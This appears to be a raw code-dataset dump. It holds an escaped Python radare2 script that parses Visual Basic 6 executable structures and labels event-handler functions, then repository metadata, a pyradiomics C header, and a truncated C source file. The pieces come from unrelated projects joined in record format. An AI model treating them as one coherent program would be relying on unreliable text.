in pool\n (\"wFormCount\", ctypes.c_ushort), # 0x44. Number of forms present\n (\"wExternalCount\", ctypes.c_ushort), # 0x46. Number of external controls\n (\"dwThunkCount\", ctypes.c_uint), # 0x48. Number of thunks to create\n (\"lpGuiTable\", ctypes.c_uint), # 0x4C. Pointer to GUI Table\n (\"lpExternalTable\", ctypes.c_uint), # 0x50. Pointer to External Table\n (\"lpComRegisterData\", ctypes.c_uint), # 0x54. Pointer to COM Information\n (\"bSZProjectDescription\", ctypes.c_uint), # 0x58. Offset to Project Description\n (\"bSZProjectExeName\", ctypes.c_uint), # 0x5C. Offset to Project EXE Name\n (\"bSZProjectHelpFile\", ctypes.c_uint), # 0x60. Offset to Project Help File\n (\"bSZProjectName\", ctypes.c_uint) # 0x64. Offset to Project Name\n ]\n\nclass CVBProjectInfo(ctypes.Structure):\n _fields_ = [\n (\"dwVersion\", ctypes.c_uint), # 0x0. 5.00 in Hex (0x1F4). Version.\n (\"lpObjectTable\", ctypes.c_uint), # 0x4. Pointer to the Object Table\n (\"dwNull\", ctypes.c_uint), # 0x8. 
Unused value after compilation.\n (\"lpCodeStart\", ctypes.c_uint), # 0xC. Points to start of code. Unused.\n (\"lpCodeEnd\", ctypes.c_uint), # 0x10. Points to end of code. Unused.\n (\"dwDataSize\", ctypes.c_uint), # 0x14. Size of VB Object Structures. Unused.\n (\"lpThreadSpace\", ctypes.c_uint), # 0x18. Pointer to Thread Object.\n (\"lpVbaSeh\", ctypes.c_uint), # 0x1C. Pointer to VBA Exception Handler\n (\"lpNativeCode\", ctypes.c_uint), # 0x20. Pointer to .DATA section.\n (\"szPathInformation\", ctypes.c_ubyte*528), # 0x24. Contains Path and ID string. < SP6\n (\"lpExternalTable\", ctypes.c_uint), # 0x234. Pointer to External Table.\n (\"dwExternalCount\", ctypes.c_uint) # 0x238. Objects in the External Table.\n ]\n\nclass CVBProjectInfo2(ctypes.Structure):\n _fields_ = [\n (\"lpHeapLink\", ctypes.c_uint), # 0x0. Unused after compilation, always 0.\n (\"lpObjectTable\", ctypes.c_uint), # 0x4. Back-Pointer to the Object Table.\n (\"dwReserved\", ctypes.c_uint), # 0x8. Always set to -1 after compiling. Unused\n (\"dwUnused\", ctypes.c_uint), # 0xC. Not written or read in any case.\n (\"lpObjectList\", ctypes.c_uint), # 0x10. Pointer to Object Descriptor Pointers.\n (\"dwUnused2\", ctypes.c_uint), # 0x14. Not written or read in any case.\n (\"szProjectDescription\", ctypes.c_uint), # 0x18. Pointer to Project Description\n (\"szProjectHelpFile\", ctypes.c_uint), # 0x1C. Pointer to Project Help File\n (\"dwReserved2\", ctypes.c_uint), # 0x20. Always set to -1 after compiling. Unused\n (\"dwHelpContextId\", ctypes.c_uint) # 0x24. Help Context ID set in Project Settings.\n ]\n\nclass CVBObjectTable(ctypes.Structure):\n _fields_ = [\n (\"lpHeapLink\", ctypes.c_uint), # 0x0. Unused after compilation, always 0.\n (\"lpExecProj\", ctypes.c_uint), # 0x4. Pointer to VB Project Exec COM Object.\n (\"lpProjectInfo2\", ctypes.c_uint), # 0x8. Secondary Project Information.\n (\"dwReserved\", ctypes.c_uint), # 0xC. Always set to -1 after compiling. Unused.\n (\"dwNull\", ctypes.c_uint), # 0x10. Not used in compiled mode.\n (\"lpProjectObject\", ctypes.c_uint), # 0x14. Pointer to in-memory Project Data.\n (\"uuidObject\", ctypes.c_ubyte*16), # 0x18. GUID of the Object Table.\n (\"fCompileState\", ctypes.c_ushort), # 0x28. Internal flag used during compilation.\n (\"dwTotalObjects\", ctypes.c_ushort), # 0x2A. Total objects present in Project.\n (\"dwCompiledObjects\", ctypes.c_ushort), # 0x2C. Equal to above after compiling.\n (\"dwObjectsInUse\", ctypes.c_ushort), # 0x2E. Usually equal to above after compile.\n (\"lpObjectArray\", ctypes.c_uint), # 0x30. Pointer to Object Descriptors\n (\"fIdeFlag\", ctypes.c_uint), # 0x34. Flag/Pointer used in IDE only.\n (\"lpIdeData\", ctypes.c_uint), # 0x38. Flag/Pointer used in IDE only.\n (\"lpIdeData2\", ctypes.c_uint), # 0x3C. Flag/Pointer used in IDE only.\n (\"lpszProjectName\", ctypes.c_uint), # 0x40. Pointer to Project Name.\n (\"dwLcid\", ctypes.c_uint), # 0x44. LCID of Project.\n (\"dwLcid2\", ctypes.c_uint), # 0x48. Alternate LCID of Project.\n (\"lpIdeData3\", ctypes.c_uint), # 0x4C. Flag/Pointer used in IDE only.\n (\"dwIdentifier\", ctypes.c_uint) # 0x50. Template Version of Structure.\n ]\n\nclass CVBPublicObjectDescriptors(ctypes.Structure):\n _fields_ = [\n (\"lpObjectInfo\", ctypes.c_uint), # 0x0. Pointer to the Object Info for this Object.\n (\"dwReserved\", ctypes.c_uint), # 0x4. Always set to -1 after compiling.\n (\"lpPublicBytes\", ctypes.c_uint), # 0x8. Pointer to Public Variable Size integers.\n (\"lpStaticBytes\", ctypes.c_uint), # 0xC. 
Pointer to Static Variable Size integers.\n (\"lpModulePublic\", ctypes.c_uint), # 0x10. Pointer to Public Variables in DATA section\n (\"lpModuleStatic\", ctypes.c_uint), # 0x14. Pointer to Static Variables in DATA section\n (\"lpszObjectName\", ctypes.c_uint), # 0x18. Name of the Object.\n (\"dwMethodCount\", ctypes.c_uint), # 0x1C. Number of Methods in Object.\n (\"lpMethodNames\", ctypes.c_uint), # 0x20. If present, pointer to Method names array.\n (\"bStaticVars\", ctypes.c_uint), # 0x24. Offset to where to copy Static Variables.\n (\"fObjectType\", ctypes.c_uint), # 0x28. Flags defining the Object Type.\n (\"dwNull\", ctypes.c_uint) # 0x2C. Not valid after compilation\n ]\n\nclass CVBPrivateObjectDescriptors(ctypes.Structure):\n _fields_ = [\n (\"lpHeapLink\", ctypes.c_uint), # 0x0. Unused after compilation, always 0.\n (\"lpObjectInfo\", ctypes.c_uint), # 0x4. Pointer to the Object Info for this Object.\n (\"dwReserved\", ctypes.c_uint), # 0x8. Always set to -1 after compiling.\n (\"dwIdeData\", ctypes.c_uint*3), # 0xC. Not valid after compilation.\n (\"lpObjectList\", ctypes.c_uint), # 0x18. Points to the Parent Structure (Array)\n (\"dwIdeData2\", ctypes.c_uint), # 0x1C. Not valid after compilation.\n (\"lpObjectList2\", ctypes.c_uint*3), # 0x20. Points to the Parent Structure (Array).\n (\"dwIdeData3\", ctypes.c_uint*3), # 0x2C. Not valid after compilation.\n (\"dwObjectType\", ctypes.c_uint), # 0x38. Type of the Object described.\n (\"dwIdentifier\", ctypes.c_uint) # 0x3C. Template Version of Structure.\n ]\n\nclass CVBObjectInfo(ctypes.Structure):\n _fields_ = [\n (\"wRefCount\", ctypes.c_ushort), # 0x0. Always 1 after compilation.\n (\"wObjectIndex\", ctypes.c_ushort), # 0x2. Index of this Object.\n (\"lpObjectTable\", ctypes.c_uint), # 0x4. Pointer to the Object Table\n (\"lpIdeData\", ctypes.c_uint), # 0x8. Zero after compilation. Used in IDE only.\n (\"lpPrivateObject\", ctypes.c_uint), # 0xC. Pointer to Private Object Descriptor.\n (\"dwReserved\", ctypes.c_uint), # 0x10. Always -1 after compilation.\n (\"dwNull\", ctypes.c_uint), # 0x14. Unused.\n (\"lpObject\", ctypes.c_uint), # 0x18. Back-Pointer to Public Object Descriptor.\n (\"lpProjectData\", ctypes.c_uint), # 0x1C. Pointer to in-memory Project Object.\n (\"wMethodCount\", ctypes.c_ushort), # 0x20. Number of Methods\n (\"wMethodCount2\", ctypes.c_ushort), # 0x22. Zeroed out after compilation. IDE only.\n (\"lpMethods\", ctypes.c_uint), # 0x24. Pointer to Array of Methods.\n (\"wConstants\", ctypes.c_ushort), # 0x28. Number of Constants in Constant Pool.\n (\"wMaxConstants\", ctypes.c_ushort), # 0x2A. Constants to allocate in Constant Pool.\n (\"lpIdeData2\", ctypes.c_uint), # 0x2C. Valid in IDE only.\n (\"lpIdeData3\", ctypes.c_uint), # 0x30. Valid in IDE only.\n (\"lpConstants\", ctypes.c_uint) # 0x34. Pointer to Constants Pool.\n ]\n\nclass CVBOptionalObjectInfo(ctypes.Structure):\n _fields_ = [\n (\"dwObjectGuids\", ctypes.c_uint), # 0x0. How many GUIDs to Register. 2 = Designer\n (\"lpObjectGuid\", ctypes.c_uint), # 0x4. Unique GUID of the Object *VERIFY*\n (\"dwNull\", ctypes.c_uint), # 0x8. Unused.\n (\"lpuuidObjectTypes\", ctypes.c_uint), # 0xC. Pointer to Array of Object Interface GUIDs\n (\"dwObjectTypeGuids\", ctypes.c_uint), # 0x10. How many GUIDs in the Array above.\n (\"lpControls2\", ctypes.c_uint), # 0x14. Usually the same as lpControls.\n (\"dwNull2\", ctypes.c_uint), # 0x18. Unused.\n (\"lpObjectGuid2\", ctypes.c_uint), # 0x1C. 
Pointer to Array of Object GUIDs.\n (\"dwControlCount\", ctypes.c_uint), # 0x20. Number of Controls in array below.\n (\"lpControls\", ctypes.c_uint), # 0x24. Pointer to Controls Array.\n (\"wEventCount\", ctypes.c_ushort), # 0x28. Number of Events in Event Array.\n (\"wPCodeCount\", ctypes.c_ushort), # 0x2A. Number of P-Codes used by this Object.\n (\"bWInitializeEvent\", ctypes.c_ushort), # 0x2C. Offset to Initialize Event from Event Table.\n (\"bWTerminateEvent\", ctypes.c_ushort), # 0x2E. Offset to Terminate Event Table.\n (\"lpEvents\", ctypes.c_uint), # 0x30. Pointer to Events Array.\n (\"lpBasicClassObject\", ctypes.c_uint), # 0x34. Pointer to in-memory Class Objects.\n (\"dwNull3\", ctypes.c_uint), # 0x38. Unused.\n (\"lpIdeData\", ctypes.c_uint) # 0x3C. Only valid in IDE.\n ]\n\nclass CVBControlInfo(ctypes.Structure):\n _fields_ = [\n (\"wUnused\", ctypes.c_ushort), # 0x0. Type of control. # Mine\n (\"fControlType\", ctypes.c_ushort), # 0x0. Type of control. # Mine\n\n (\"wEventcount\", ctypes.c_ushort), # 0x4. Number of Event Handlers supported.\n (\"bWEventsOffset\", ctypes.c_ushort), # 0x6. Offset in to Memory struct to copy Events.\n (\"lpGuid\", ctypes.c_uint), # 0x8. Pointer to GUID of this Control.\n (\"dwIndex\", ctypes.c_uint), # 0xC. Index ID of this Control.\n (\"dwNull\", ctypes.c_uint), # 0x10. Unused.\n (\"dwNull2\", ctypes.c_uint), # 0x14. Unused.\n (\"lpEventTable\", ctypes.c_uint), # 0x18. Pointer to Event Handler Table.\n (\"lpIdeData\", ctypes.c_uint), # 0x1C. Valid in IDE only.\n (\"lpszName\", ctypes.c_uint), # 0x20. Name of this Control.\n (\"dwIndexCopy\", ctypes.c_uint) # 0x24. Secondary Index ID of this Control\n ]\n\nclass CVBEventHandlerTable(ctypes.Structure):\n _fields_ = [\n (\"dwNull\", ctypes.c_uint), # 0x0.\n (\"dwUnknown0\", ctypes.c_uint), # 0x4.\n (\"dwUnknown1\", ctypes.c_uint), # 0x8.\n (\"lpEVENT_SINK_QueryInterface\", ctypes.c_uint), # 0xC.\n (\"lpEVENT_SINK_Release\", ctypes.c_uint), # 0x10.\n (\"lpRelease\", ctypes.c_uint), # 0x14.\n (\"lpEntryPoint\", ctypes.c_uint) # 0x18.\n ]\n\nclass CVBGUID(ctypes.Structure):\n _fields_ = [\n (\"Data1\", ctypes.c_uint), # Specifies the first 8 hexadecimal digits of the GUID.\n (\"Data2\", ctypes.c_ushort), # Specifies the first group of 4 hexadecimal digits.\n (\"Data3\", ctypes.c_ushort), # Specifies the second group of 4 hexadecimal digits.\n (\"Data4\", ctypes.c_ubyte*8) # Array of 8 bytes. 
The first 2 bytes contain the third group of 4 hexadecimal digits.\n # The remaining 6 bytes contain the final 12 hexadecimal digits.\n ]\n\n\nMDLInternalControlFlags = [\n (0x00, 0x00000001, \"PictureBox Object\"),\n (0x01, 0x00000002, \"Label Object\"),\n (0x02, 0x00000004, \"TextBox Object\"),\n (0x03, 0x00000008, \"Frame Object\"),\n (0x04, 0x00000010, \"CommandButton Object\"),\n (0x05, 0x00000020, \"CheckBox Object\"),\n (0x06, 0x00000040, \"OptionButton Object\"),\n (0x07, 0x00000080, \"ComboBox Object\"),\n (0x08, 0x00000100, \"ListBox Object\"),\n (0x09, 0x00000200, \"HScrollBar Object\"),\n (0x0A, 0x00000400, \"VScrollBar Object\"),\n (0x0B, 0x00000800, \"Timer Object\"),\n (0x0C, 0x00001000, \"Print Object\"),\n (0x0D, 0x00002000, \"Form Object\"),\n (0x0E, 0x00004000, \"Screen Object\"),\n (0x0F, 0x00008000, \"Clipboard Object\"),\n (0x10, 0x00010000, \"Drive Object\"),\n (0x11, 0x00020000, \"Dir Object\"),\n (0x12, 0x00040000, \"FileListBox Object\"),\n (0x13, 0x00080000, \"Menu Object\"),\n (0x14, 0x00100000, \"MDIForm Object\"),\n (0x15, 0x00200000, \"App Object\"),\n (0x16, 0x00400000, \"Shape Object\"),\n (0x17, 0x00800000, \"Line Object\"),\n (0x18, 0x01000000, \"Image Object\"),\n (0x19, 0x02000000, \"Unsupported\"),\n (0x1A, 0x04000000, \"Unsupported\"),\n (0x1B, 0x08000000, \"Unsupported\"),\n (0x1C, 0x10000000, \"Unsupported\"),\n (0x1D, 0x20000000, \"Unsupported\"),\n (0x1E, 0x40000000, \"Unsupported\"),\n (0x1F, 0x80000000, \"Unsupported\")\n]\n\nCtrlFlags = [\n (0x00, 0x0000001A, \"PictureBox\"),\n (0x01, 0x00000012, \"Label\"),\n (0x02, 0x00000018, \"TextBox\"),\n (0x03, 0x0000000D, \"Frame\"),\n (0x04, 0x00000011, \"CommandButton\"),\n (0x05, 0x00000000, \"CheckBox\"),\n (0x06, 0x00000013, \"OptionButton\"),\n (0x07, 0x00000000, \"ComboBox\"),\n (0x08, 0x00000015, \"ListBox\"),\n (0x09, 0x00000000, \"HScrollBar\"),\n (0x0A, 0x00000000, \"VScrollBar\"),\n (0x0B, 0x00000001, \"Timer\"),\n (0x0C, 0x00000000, \"Print\"),\n (0x0D, 0x00000000, \"Form\"),\n (0x0E, 0x00000000, \"Screen\"),\n (0x0F, 0x00000000, \"Clipboard\"),\n (0x10, 0x00000000, \"Drive\"),\n (0x11, 0x00000014, \"Dir\"),\n (0x12, 0x00000000, \"FileListBox\"),\n (0x13, 0x00000000, \"Menu\"),\n (0x14, 0x00000000, \"MDIForm\"),\n (0x15, 0x00000000, \"App\"),\n (0x16, 0x00000000, \"Shape\"),\n (0x17, 0x00000000, \"Line\"),\n (0x18, 0x0000000D, \"Image\"),\n (0x19, 0x0000001D, \"Grid\"),\n (0x1A, 0x00000016, \"StatusBar\"),\n (0x1B, 0x0000000A, \"Communication\"),\n (0x1C, 0x00000000, \"Unsupported\"),\n (0x1D, 0x00000000, \"Unsupported\"),\n (0x1E, 0x00000000, \"Unsupported\"),\n (0x1F, 0x00000000, \"Unsupported\")\n]\n\n'''\n[ # 2nd Flag Zone 2nd Flag Zone 2nd Flag Zone\n (0x20, 0x00000001, \"Unsupported\"),\n (0x21, 0x00000002, \"Unsupported\"),\n (0x22, 0x00000004, \"Unsupported\"),\n (0x23, 0x00000008, \"Unsupported\"),\n (0x24, 0x00000010, \"Unsupported\"),\n (0x25, 0x00000020, \"DataQuery Object\"),\n (0x26, 0x00000040, \"OLE Object\"),\n (0x27, 0x00000080, \"Unsupported\"),\n (0x28, 0x00000100, \"UserControl Object\"),\n (0x29, 0x00000200, \"PropertyPage Object\"),\n (0x2A, 0x00000400, \"Document Object\"),\n (0x2B, 0x00000800, \"Unsupported\")\n]\n'''\n\nCtrlButtonEvents = {\n 0x0: \"Click\",\n 0x1: \"DragDrop\",\n 0x2: \"DragOver\",\n 0x3: \"GotFocus\",\n 0x4: \"KeyDown\",\n 0x5: \"KeyPress\",\n 0x6: \"KeyUp\",\n 0x7: \"LostFocus\",\n 0x8: \"MouseDown\",\n 0x9: \"MouseMove\",\n 0xA: \"MouseUp\",\n 0xB: \"OLEDragOver\",\n 0xC: \"OLEDragDrop\",\n 0xD: \"OLEGiveFeedback\",\n 0xE: \"OLEStartDrag\",\n 
0xF: \"OLESetData\",\n 0x10: \"OLECompleteDrag\"\n}\n\nCtrlTextboxEvents = {\n 0x0: \"Change\",\n 0x1: \"DragDrop\",\n 0x2: \"DragOver\",\n 0x3: \"GotFocus\",\n 0x4: \"KeyDown\",\n 0x5: \"KeyPress\",\n 0x6: \"KeyUp\",\n 0x7: \"LinkClose\",\n 0x8: \"LinkError\",\n 0x9: \"LinkOpen\",\n 0xA: \"LostFocus\",\n 0xB: \"LinkNotify\",\n 0xC: \"MouseDown\",\n 0xD: \"MouseMove\",\n 0xE: \"MouseUp\",\n 0xF: \"Click\",\n 0x10: \"DblClick\",\n 0x11: \"OLEDragOver\",\n 0x12: \"OLEDragDrop\",\n 0x13: \"OLEGiveFeedback\",\n 0x14: \"OLEStartDrag\",\n 0x15: \"OLESetData\",\n 0x16: \"OLECompleteDrag\",\n 0x17: \"Validate\"\n}\n\nCtrlFormEvents = {\n 0x0: \"DragDrop\",\n 0x1: \"DragOver\",\n 0x2: \"LinkClose\",\n 0x3: \"LinkError\",\n 0x4: \"LinkExecute\",\n 0x5: \"LinkOpen\",\n 0x6: \"Load\",\n 0x7: \"Resize\",\n 0x8: \"Unload\",\n 0x9: \"QueryUnload\",\n 0xA: \"Activate\",\n 0xB: \"Deactivate\",\n 0xC: \"Click\",\n 0xD: \"DblClick\",\n 0xE: \"GotFocus\",\n 0xF: \"KeyDown\",\n 0x10: \"KeyPress\",\n 0x11: \"KeyUp\",\n 0x12: \"LostFocus\",\n 0x13: \"MouseDown\",\n 0x14: \"MouseMove\",\n 0x15: \"MouseUp\",\n 0x16: \"Paint\",\n 0x17: \"Initialize\",\n 0x18: \"Terminate\",\n 0x19: \"OLEDragOver\",\n 0x1A: \"OLEDragDrop\",\n 0x1B: \"OLEGiveFeedback\",\n 0x1C: \"OLEStartDrag\",\n 0x1D: \"OLESetData\",\n 0x1E: \"OLECompleteDrag\"\n}\n\nCtrlFileEvents = {\n 0x0: \"Click\",\n 0x1: \"DblClick\",\n 0x2: \"DragDrop\",\n 0x3: \"DragOver\",\n 0x4: \"GotFocus\",\n 0x5: \"KeyDown\",\n 0x6: \"KeyPress\",\n 0x7: \"KeyUp\",\n 0x8: \"LostFocus\",\n 0x9: \"MouseDown\",\n 0xA: \"MouseMove\",\n 0xB: \"MouseUp\",\n 0xC: \"PathChange\",\n 0xD: \"PatternChange\",\n 0xE: \"OLEDragOver\",\n 0xF: \"OLEDragDrop\",\n 0x10: \"OLEGiveFeedback\",\n 0x11: \"OLEStartDrag\",\n 0x12: \"OLESetData\",\n 0x13: \"OLECompleteDrag\",\n 0x14: \"Scroll\",\n 0x15: \"Validate\"\n}\n\nCtrlOptionEvents = {\n 0x0: \"Click\",\n 0x1: \"DblClick\",\n 0x2: \"DragDrop\",\n 0x3: \"DragOver\",\n 0x4: \"GotFocus\",\n 0x5: \"KeyDown\",\n 0x6: \"KeyPress\",\n 0x7: \"KeyUp\",\n 0x8: \"LostFocus\",\n 0x9: \"MouseDown\",\n 0xA: \"MouseMove\",\n 0xB: \"MouseUp\",\n 0xC: \"OLEDragOver\",\n 0xD: \"OLEDragDrop\",\n 0xE: \"OLEGiveFeedback\",\n 0xF: \"OLEStartDrag\",\n 0x10: \"OLESetData\",\n 0x11: \"OLECompleteDrag\",\n 0x12: \"Validate\"\n}\n\nCtrlComboEvents = {\n 0x0: \"Change\",\n 0x1: \"Click\",\n 0x2: \"DblClick\",\n 0x3: \"DragDrop\",\n 0x4: \"DragOver\",\n 0x5: \"DropDown\",\n 0x6: \"GotFocus\",\n 0x7: \"KeyDown\",\n 0x8: \"KeyPress\",\n 0x9: \"KeyUp\",\n 0xA: \"LostFocus\",\n 0xB: \"OLEDragOver\",\n 0xC: \"OLEDragDrop\",\n 0xD: \"OLEGiveFeedback\",\n 0xE: \"OLEStartDrag\",\n 0xF: \"OLESetData\",\n 0x10: \"OLECompleteDrag\",\n 0x11: \"Scroll\",\n 0x12: \"Validate\"\n}\n\nCtrlLabelEvents = {\n 0x0: \"Change\",\n 0x1: \"Click\",\n 0x2: \"DblClick\",\n 0x3: \"DragDrop\",\n 0x4: \"DragOver\",\n 0x5: \"LinkClose\",\n 0x6: \"LinkError\",\n 0x7: \"LinkOpen\",\n 0x8: \"MouseDown\",\n 0x9: \"MouseMove\",\n 0xA: \"MouseUp\",\n 0xB: \"LinkNotify\",\n 0xC: \"OLEDragOver\",\n 0xD: \"OLEDragDrop\",\n 0xE: \"OLEGiveFeedback\",\n 0xF: \"OLEStartDrag\",\n 0x10: \"OLESetData\",\n 0x11: \"OLECompleteDrag\"\n}\n\nCtrlMenuEvents = {\n 0x0: \"Click\"\n}\n\nCtrlTimerEvents = {\n 0x0: \"Timer\"\n}\n\nCT_BUTTON = 0x33AD4EF2\nCT_TEXTBOX = 0x33AD4EE2\nCT_TIMER = 0x33AD4F2A\nCT_FORM = 0x33AD4F3A\nCT_FILE = 0x33AD4F62\nCT_OPTION = 0x33AD4F02\nCT_COMBOBOX = 0x33AD4F03\nCT_COMBOBOX2 = 0x33AD4F0A\nCT_MENU = 0x33AD4F6A\nCT_LABEL = 0x33AD4EDA\n\nCtrlEvents = {\n CT_BUTTON: CtrlButtonEvents,\n 
CT_TEXTBOX: CtrlTextboxEvents,\n CT_TIMER: CtrlTimerEvents,\n CT_FORM: CtrlFormEvents,\n CT_FILE: CtrlFileEvents,\n CT_OPTION: CtrlOptionEvents,\n CT_COMBOBOX: CtrlComboEvents,\n CT_COMBOBOX2: CtrlComboEvents,\n CT_MENU: CtrlMenuEvents,\n CT_LABEL: CtrlLabelEvents\n}\n\n\nB2S = lambda M: \"\".join(map(chr, M))\n\n\nHF_LENGTH = 100 # Header & Footer : Fixed Length\n\n\ndef IsAddressValid(addr):\n obj = r2.cmdj(\"iSj\")\n result = False\n for sec in obj:\n test = (addr >= sec[\"vaddr\"])\n test = test and (addr <= sec[\"vaddr\"] + sec[\"vsize\"])\n result = result or test\n return result\n\n\ndef Dword(addr):\n bts = r2.cmdj(\"pxj 4 @0x%x\" % addr)\n if sys.version_info[0] == 2:\n bts = \"\".join([chr(i) for i in bts])\n else:\n bts = bytes(bts)\n return ctypes.c_uint.from_buffer_copy(bts).value\n\n\ndef ParseStructure(a, t):\n global r2\n p = r2.cmdj(\"pxj %d @ 0x%x\" % (ctypes.sizeof(t), a))\n if p is None:\n return None\n if sys.version_info[0] == 2:\n p = b\"\".join([chr(i) for i in p])\n else:\n p = bytes(p)\n return t.from_buffer_copy(p)\n\n\ndef GetControlDescriptionByTypeID(TypeID):\n result = \"\"\n for e in CtrlFlags:\n index, typeid, description = e[0:len(e)]\n if typeid == TypeID:\n if len(result) != 0:\n result += (\" or \" + description)\n else:\n result = description\n return result\n\n\ndef CreateFunction(address, name):\n result = True\n r2.cmd(\"af @0x%x\" % address)\n r2.cmd(\"afn %s 0x%x\" % (name, address))\n return result\n\n\ndef CreateFlag(address, name):\n r2.cmd(\"f %s @0x%x\" % (name, address))\n\n\ndef GetEventByID(ctrl_type, event_id):\n ctrl_events, result = None, \"Unknown\"\n for ctrlType in CtrlEvents.keys():\n if ctrlType == ctrl_type:\n ctrl_events = CtrlEvents[ctrlType]\n break\n if ctrl_events is None:\n return result\n for eventID in ctrl_events.keys():\n if eventID == event_id:\n result = ctrl_events[eventID]\n break\n return result\n\n\ndef GetString(addr):\n return r2.cmd(\"psz @0x%x\" % addr).strip()\n\n\ndef ParseControlInfo(object_name, obj_addr):\n VBControlInfo = ParseStructure(obj_addr, CVBControlInfo)\n control_name = GetString(VBControlInfo.lpszName)\n VBGUID = ParseStructure(VBControlInfo.lpGuid, CVBGUID)\n control_type = VBGUID.Data1\n VBEventHandlerTable = ParseStructure(VBControlInfo.lpEventTable, CVBEventHandlerTable)\n entry_point = VBControlInfo.lpEventTable + sizeof(CVBEventHandlerTable) - 4\n for control_id in range(0, VBControlInfo.fControlType):\n p = entry_point + 4*control_id\n if IsAddressValid(p):\n addr_event = Dword(p)\n if IsAddressValid(addr_event):\n print(\"Trampoline at %x\" % addr_event)\n print(\"Event: %s\" %\n (control_name + \"_\" +\n GetEventByID(control_type, control_id)))\n # Parse trampoline and flag the correct function\n obj = r2.cmdj(\"pdj 2 @0x%x\" % addr_event)\n jump = obj[1]\n if obj[0][\"type\"] == \"sub\" and jump[\"type\"] == \"jmp\":\n real_func = jump[\"jump\"]\n control_type = GetEventByID(control_type, control_id)\n if control_type == \"Unknown\" :\n control_type = \"%x\" % real_func\n event_name = \"fn.%s_%s_%s\" % (object_name, control_name,\n control_type)\n CreateFunction(real_func, event_name)\n\n\ndef ParsePrivateObjectInfo(object_name, obj_addr):\n VBOptionalObjectInfo = ParseStructure(obj_addr, CVBOptionalObjectInfo)\n for j in range(0, VBOptionalObjectInfo.dwControlCount):\n ### CONTROL INFO ###\n addr_vb_control_info = VBOptionalObjectInfo.lpControls + j*sizeof(CVBControlInfo)\n if IsAddressValid(addr_vb_control_info ):\n ParseControlInfo(object_name, addr_vb_control_info)\n\n for j in 
range(0, VBOptionalObjectInfo.wEventCount):\n addr_vb_event = VBOptionalObjectInfo.lpEvents + j*4\n if not IsAddressValid(addr_vb_event): return STATUS()\n event_eat = Dword(addr_vb_event) # eat: event address table\n if not IsAddressValid(event_eat): return STATUS()\n\n # This method belongs VB Table or User Defined? 0xFFFF -> User Defined.\n addr_magic = event_eat - 4\n if not IsAddressValid(addr_magic): return STATUS()\n magic = Dword(addr_magic)\n is_user_defined = (magic == 0xFFFF)\n\n obj = r2.cmdj(\"pdj 1 @0x%x\" % event_eat)\n jump = obj[0]\n if jump[\"type\"] == \"jmp\":\n event = jump[\"jump\"]\n if is_user_defined == True:\n event_name = \"fn.Unknown_%08X\" % event\n CreateFunction(event, event_name)\n\ndef ParseObjectDescriptor(obj_addr):\n VBPublicObjectDescriptor = ParseStructure(obj_addr,\n CVBPublicObjectDescriptors)\n object_name = GetString(VBPublicObjectDescriptor.lpszObjectName)\n CreateFlag(obj_addr, \"VB.\" + object_name + \"_Descriptor\")\n\n # Parse ObjectInfo\n VBObjectInfo = ParseStructure(VBPublicObjectDescriptor.lpObjectInfo, CVBObjectInfo)\n object_name = GetString(VBPublicObjectDescriptor.lpszObjectName)\n CreateFlag(VBPublicObjectDescriptor.lpObjectInfo, object_name + \".ObjectInfo\")\n\n addr_vb_optional_object_info = VBPublicObjectDescriptor.lpObjectInfo + sizeof(CVBObjectInfo)\n if VBObjectInfo.lpConstants != addr_vb_optional_object_info:\n ParsePrivateObjectInfo(object_name, addr_vb_optional_object_info)\n\n\nsizeof = ctypes.sizeof\nr2 = r2pipe.open()\ninstr = r2.cmdj(\"pdj 2 @entry0\")\naddr_vb_header = instr[0][\"ptr\"]\nVBHeader = ParseStructure(addr_vb_header, CVBHeader)\nVBProjectInfo = ParseStructure(VBHeader.lpProjectData, CVBProjectInfo)\nVBObjectTable = ParseStructure(VBProjectInfo.lpObjectTable, CVBObjectTable)\n\n# PUBLIC OBJECT DESCRIPTORS #\nfor i in range(0, VBObjectTable.dwTotalObjects):\n addr_vb_public_object_descriptors = (VBObjectTable.lpObjectArray +\n i*sizeof(CVBPublicObjectDescriptors))\n ParseObjectDescriptor(addr_vb_public_object_descriptors)\n" } ]
2
drmaxchen/pyradio
https://github.com/drmaxchen/pyradio
dd14e8796e1dea745cfe8fcfd57bf71a8e1e8fa0
f2e46856425cfb233d29d391199bfb9b85824b06
48f49bfe57008ae0c30f602bb14ff3b11fd7d447
refs/heads/master
2020-03-27T23:24:39.552705
2018-09-04T08:46:39
2018-09-04T08:46:39
147,315,093
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7513227462768555, "alphanum_fraction": 0.7513227462768555, "avg_line_length": 93.5, "blob_id": "7b0160567e3016cdf6185bd35aafb814f56da4cf", "content_id": "093c8bdb3b991ef32fe8cbb4462d3c3fbbdade73", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 189, "license_type": "permissive", "max_line_length": 104, "num_lines": 2, "path": "/radiomics/src/cshape.h", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "double calculate_surfacearea(char *mask, int *size, int *strides, double *spacing);\nint calculate_diameter(char *mask, int *size, int *strides, double *spacing, int Ns, double *diameters);\n" }, { "alpha_fraction": 0.6456996202468872, "alphanum_fraction": 0.6525459885597229, "avg_line_length": 31.160551071166992, "blob_id": "9b2481d181cf785153ed7a890af3b1c66308d503", "content_id": "b0c3e91d78dff3a848c49e0651ff85d5728a41ec", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 7011, "license_type": "permissive", "max_line_length": 142, "num_lines": 218, "path": "/radiomics/src/_cshape.c", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "#define NPY_NO_DEPRECATED_API NPY_1_7_API_VERSION\n\n#include <stdlib.h>\n#include <Python.h>\n#include <numpy/arrayobject.h>\n#include \"cshape.h\"\n\nstatic char module_docstring[] = \"This module links to C-compiled code for efficient calculation of the surface area \"\n \"in the pyRadiomics package. It provides fast calculation using a marching cubes \"\n \"algortihm, accessed via \"\"calculate_surfacearea\"\". Arguments for this function\"\n \"are positional and consist of two numpy arrays, mask and pixelspacing, which must \"\n \"be supplied in this order. Pixelspacing is a 3 element vector containing the pixel\"\n \"spacing in z, y and x dimension, respectively. All non-zero elements in mask are \"\n \"considered to be a part of the segmentation and are included in the algorithm.\";\nstatic char surface_docstring[] = \"Arguments: Mask, PixelSpacing, uses a marching cubes algorithm to calculate an \"\n \"approximation to the total surface area. 
